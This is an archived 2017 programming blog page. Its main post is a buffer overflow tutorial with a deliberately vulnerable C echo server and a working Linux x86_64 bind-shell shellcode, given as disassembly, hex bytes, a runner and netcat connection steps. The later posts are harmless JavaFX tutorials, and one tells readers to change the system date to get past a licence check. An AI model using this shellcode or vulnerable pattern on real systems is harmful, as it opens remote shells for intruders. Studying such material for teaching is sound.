January 2017

Friday 20 January 2017

Buffer Overflow Tutorial: Socket Programs

Ajith KP January 20, 2017

Buffer Overflow is the vulnerability which make your system high risk. It allows unlimited access to the attacker, and allows inject shellcodes. That is the attacker can execute any malicious codes on target machine. This video tutorial shows how the hackers exploits remote services running in remote systems and how to get access to it. Here I'm using custom socket program, which is a vulnerable to Stack Buffer Overflow. The program is ECHO server, which listens port 5601.

Vulnerable Code

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
/*
http://www.terminalcoders.blogspot.com
BOF Tutorial
Video: https://youtu.be/uPfBkU0LqBA
*/
void copy(char str[8000]){ //Vulnerable function
  char cpy[84];
  strcpy(cpy, str); //Vulnerable section
}
void start_server(){
    char str[8000], cpy[64];
    int sfd, cfd;
 
    struct sockaddr_in sock;
 
    sfd = socket(AF_INET, SOCK_STREAM, 0);
 
    bzero(&sock, sizeof(sock));
 
    sock.sin_family = AF_INET;
    sock.sin_addr.s_addr = htons(INADDR_ANY);
    sock.sin_port = htons(5601); //Binding port
 
    bind(sfd, (struct sockaddr *) &sock, sizeof(sock));
 
    listen(sfd, 10);
 
    cfd = accept(sfd, (struct sockaddr*) NULL, NULL);
 
    while(1){
        read(cfd,str,8000);
        copy(str);
        puts(str);
        write(cfd, str, strlen(str)+1);
    }
}
int main(int argc, char **argv){
    start_server();
}

ShellCode

/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes

Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 d2              xor    %rdx,%rdx
  400086: 48 31 f6              xor    %rsi,%rsi
  400089: ff c6                 inc    %esi
  40008b: 6a 29                 pushq  $0x29
  40008d: 58                    pop    %rax
  40008e: 6a 02                 pushq  $0x2
  400090: 5f                    pop    %rdi
  400091: 0f 05                 syscall 
  400093: 48 97                 xchg   %rax,%rdi
  400095: 6a 02                 pushq  $0x2
  400097: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp)
  40009e: 54                    push   %rsp
  40009f: 5e                    pop    %rsi
  4000a0: 52                    push   %rdx
  4000a1: 6a 31                 pushq  $0x31
  4000a3: 58                    pop    %rax
  4000a4: 6a 10                 pushq  $0x10
  4000a6: 5a                    pop    %rdx
  4000a7: 0f 05                 syscall 
  4000a9: 5e                    pop    %rsi
  4000aa: 6a 32                 pushq  $0x32
  4000ac: 58                    pop    %rax
  4000ad: 0f 05                 syscall 
  4000af: 6a 2b                 pushq  $0x2b
  4000b1: 58                    pop    %rax
  4000b2: 0f 05                 syscall 
  4000b4: 48 97                 xchg   %rax,%rdi
  4000b6: 6a 03                 pushq  $0x3
  4000b8: 5e                    pop    %rsi
  4000b9: ff ce                 dec    %esi
  4000bb: b0 21                 mov    $0x21,%al
  4000bd: 0f 05                 syscall 
  4000bf: 75 f8                 jne    0x4000b9
  4000c1: f7 e6                 mul    %esi
  4000c3: 52                    push   %rdx
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 48 8d 3c 24           lea    (%rsp),%rdi
  4000d3: b0 3b                 mov    $0x3b,%al
  4000d5: 0f 05                 syscall

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bind_shell bind_shell.c
$ execstack -s bind_shell
$ ./bind_shell

How to Connect

$ nc <HOST IP ADDRESS> 5600

Eg:

$ nc 127.0.0.1 5600

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
void main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) sh;
 (int)(*func)();
}

Video

Saturday 14 January 2017

Programming Languages Theory

Snow Falling Animation in JavaFX

Ajith KP January 14, 2017

Hi GuyZ,
This tutorial will show how to create snow falling effect in JavaFX. The first step is creating snow particles. The best shape to create snow particles is circle. So, first we have to create some circles to make them snow particles.

Download Source: https://github.com/ajithkp560/SnowFallingAnimationJavaFX

Code to initialize circle

        Circle c[] = new Circle[2000];
        for (int i = 0; i < 2000; i++) {
            c[i] = new Circle(1, 1, 1);
            c[i].setRadius(random.nextDouble() * 3);
            Color color = Color.rgb(255, 255, 255, random.nextDouble());
            c[i].setFill(color);
            root.getChildren().add(c[i]);
        }

Yeah, we have initialized the circles. Next step is animating them to fall from top to bottom.

Animation code to fall from top to bottom

        Animation fall = TranslateTransitionBuilder.create()
                .node(c)
                .fromY(-200)
                .toY(534+200) //WIndow height = 534
                .toX(random.nextDouble() * c.getCenterX())
                .duration(Duration.seconds(time))
                .onFinished(new EventHandler<ActionEvent>() {
                    @Override
                    public void handle(ActionEvent t) {
                        Raining(c);
                    }
                }).build();

Full Source Code

import java.util.Random;
import javafx.animation.Animation;
import javafx.animation.TranslateTransitionBuilder;
import javafx.application.Application;
import javafx.event.ActionEvent;
import javafx.event.EventHandler;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.image.Image;
import javafx.scene.image.ImageView;
import javafx.scene.layout.AnchorPane;
import javafx.scene.layout.StackPane;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.stage.Stage;
import javafx.util.Duration;

/**
 *
 * @author Ajith Kp [ajithkp560] http://www.terminalcoders.blogspot.com
 * http://fb.com/ajithkp560
 *
 */
public class SnowFallingEffect extends Application {

    Random random = new Random();
    AnchorPane root = new AnchorPane();

    @Override
    public void start(Stage primaryStage) {
        Circle c[] = new Circle[2000];
        ImageView background = new ImageView(new Image(getClass().getResource("Backgroundx.png").toString()));
        root.getChildren().add(background);

        for (int i = 0; i < 2000; i++) {
            c[i] = new Circle(1, 1, 1);
            c[i].setRadius(random.nextDouble() * 3);
            Color color = Color.rgb(255, 255, 255, random.nextDouble());
            c[i].setFill(color);
            root.getChildren().add(c[i]);
            Raining(c[i]);
        }
        Scene scene = new Scene(root, 950, 534);
        primaryStage.setTitle("SnowFalling Animation : Ajith Kp");
        primaryStage.setScene(scene);
        primaryStage.show();
    }

    public void Raining(Circle c) {
        c.setCenterX(random.nextInt(950));//Window width = 950
        int time = 10 + random.nextInt(50);
        Animation fall = TranslateTransitionBuilder.create()
                .node(c)
                .fromY(-200)
                .toY(534+200) //WIndow height = 534
                .toX(random.nextDouble() * c.getCenterX())
                .duration(Duration.seconds(time))
                .onFinished(new EventHandler<ActionEvent>() {
                    @Override
                    public void handle(ActionEvent t) {
                        Raining(c);
                    }
                }).build();
        fall.play();
    }

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        launch(args);
    }

}

Programming Languages Theory

Timer Enabled Browser in javaFX

Ajith KP January 14, 2017

Hi GuyZ,
This is another utility application created by me for event `zeITgeist 2K17` conducted by Kannur University, Mangattuparamba Campus. This application is coded in JavaFX, my favorite programming language for creating interactive graphics applications. JavaFX is the programming language developed by Oracle for creating RIAs (Rich Internet Application).

The library named 'JxBrowser'(https://www.teamdev.com/jxbrowser) is used to develop this application. This library is created based on open source browser by Google named `Chromium Browser`. So, this library provides a good interactive browser environment. This library provides better environment than `WebView` controller provided by JavaFX. First of all, I started this project using WebView controller. But later I understood It have some limitations. So I moved to JxBrowser.

The finish scene will open when the competitor presses `Finish` button or the allocated time expires.

Before run JAR file, first change your system date to "11/Jan/2017", because of License issues.

Download JAR File: https://github.com/ajithkp560/JavaFXTimerBrowser/raw/master/TimerFX.jar

Download Project Source code: https://github.com/ajithkp560/JavaFXTimerBrowser

Screen shots

Starting Page

Browser with timer

Finish Page

Friday 13 January 2017

Programming Languages Theory

ZaulTimer: A JavaFX based Animated Timer for Competition Events

Ajith KP January 13, 2017

Hi GuyZ,
The ZaulTimer is a JavaFX based animated timer created for IT fest conducted in Kannur University Campus, Mangattuparamba. The JavaFX is my favorite language which I have used for creating animations enabled applications.

Window with hidden timer